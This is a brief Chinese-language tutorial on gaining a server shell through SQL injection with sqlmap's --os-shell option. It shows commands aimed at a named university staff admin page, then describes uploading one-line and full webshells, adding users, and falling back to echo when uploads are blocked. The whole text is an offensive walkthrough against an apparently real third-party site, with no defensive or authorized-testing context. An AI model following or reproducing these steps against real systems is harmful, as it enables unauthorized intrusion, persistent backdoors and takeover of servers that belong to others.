利用sqlmap之--os-shell拿shell

过程:

D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --curren
t-user

 

 

必须是root权限

D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --os-shell

这里根据网站的实际情况来选择脚本语言

 

 

添加网站路径(必须的)

 

进入os_shell模式成功 就可以写shell了,分2种情况

1.可以看到带路径的直接访问这个路径地址

2.如果可以添加用户 也可以直接在下面输入命令添加

 

打开地址

上传一句话到目录就可以了

注：如果一句话之类的被拦截或者无法回显,可以测试直接上传大马

 

如果大马也失败的话 可以利用echo命令